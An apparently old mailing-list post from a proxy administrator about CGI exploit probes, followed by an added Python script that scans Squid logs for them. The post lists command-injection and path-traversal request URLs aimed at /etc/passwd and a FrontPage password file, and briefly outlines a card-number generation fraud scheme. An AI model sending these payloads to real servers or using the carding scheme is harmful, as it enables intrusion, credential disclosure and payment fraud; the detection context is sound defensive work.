Recently, I seem to be getting more and more CGI exploit attempts. One such came through a Squid at an educational institution. They reported 345 attempts to get /cgi-bin/aglimpse/80* .....

There seems to be a list somewhere of CGI exploits such as:

    /cgi-bin/phf?Qname=me%0als%20-lFa
    /cgi-bin/faxsurvey?ls%20-lFa
    /cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
    /cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
    /cgi-bin/php.cgi?/etc/passwd
    /cgi-bin/view-source?../../../../../../../../etc/passwd
    /cgi-bin/htmlscript?../../../../../../../../etc/passwd
    /cgi-bin/campas?%0als%20-lFa%20/etc
    /cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
    /cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
    /cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'
    /_vti_pvt/service.pwd HTTP/1.0"

I suggested to my correspondent that they might consider the URL regex features in Squid 2 to block such attempts.

On a semi-related subject, I hear of schemes to generate sequences of random credit-card numbers, filter them through a checksum generator, then use them to attempt to buy time on sex sites. Such sites may not validate expiry dates or check names, require any corroborating ID etc. and may mail passwords to temporary or anonymous email addresses. Attempts may use public proxies to obfuscate the trail...

cheers

Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
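A log check for the request patterns listed in the post, as an added example that is not part of the original message: it reads Squid native-format access.log lines, percent-decodes each URL, and counts probe-like requests per client so a proxy operator can see which hosts are sending them. The function names `classify` and `scan`, the payload markers, the field positions (client in column 3, URL in column 7) and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# CGI script names copied from the request list in the post.
PROBED = {"phf", "faxsurvey", "handler", "webdist.cgi", "php.cgi", "view-source",
          "htmlscript", "campas", "info2www", "aglimpse", "pfdisplay.cgi"}
SCRIPT = re.compile(r"^/cgi-bin/([^/?|;]+)", re.I)
# Markers seen in those requests after percent-decoding: newline, shell
# metacharacters, directory traversal, references to /etc/.
PAYLOAD = re.compile(r"[\r\n;|`]|\.\./|/etc/")

# Constructed sample in Squid's native access.log layout (not real traffic).
SAMPLE_LOG = """\
909300000.101 120 192.0.2.10 TCP_MISS/404 310 GET http://www.example.org/cgi-bin/phf?Qname=me%0als%20-lFa - DIRECT/www.example.org text/html
909300001.202 98 192.0.2.10 TCP_MISS/404 310 GET http://www.example.org/cgi-bin/faxsurvey?ls%20-lFa - DIRECT/www.example.org text/html
909300002.303 75 192.0.2.10 TCP_MISS/404 310 GET http://www.example.org/_vti_pvt/service.pwd - DIRECT/www.example.org text/html
909300003.404 60 192.0.2.77 TCP_MISS/200 2048 GET http://www.example.org/cgi-bin/search?q=squid - DIRECT/www.example.org text/html
909300004.505 60 192.0.2.10 TCP_MISS/404 310 GET http://www.example.org/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo - DIRECT/www.example.org text/html
"""

def classify(url):
    """Return a label if the URL resembles a probe from the list, else None."""
    # Drop scheme and host (proxy logs carry absolute URLs), then decode %xx.
    path = unquote(re.sub(r"^[a-z]+://[^/]+", "", url, flags=re.I))
    if path.lower().startswith("/_vti_pvt/"):
        return "frontpage-password-file"
    m = SCRIPT.match(path)
    if not m:
        return None
    known = m.group(1).lower() in PROBED
    payload = bool(PAYLOAD.search(path[m.end():]))
    if known:
        return "known-script+payload" if payload else "known-script"
    return "cgi+payload" if payload else None

def scan(lines):
    """Count probe-like requests per (client, label) in native access.log lines."""
    hits = Counter()
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # not a native-format line
        label = classify(fields[6])
        if label:
            hits[(fields[2], label)] += 1
    return hits

if __name__ == "__main__":
    for (client, label), n in sorted(scan(SAMPLE_LOG.splitlines()).items()):
        print(f"{client}\t{label}\t{n}")
```

A bare "known-script" hit is lower confidence than one with a payload marker, since a site may still run one of those scripts legitimately.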
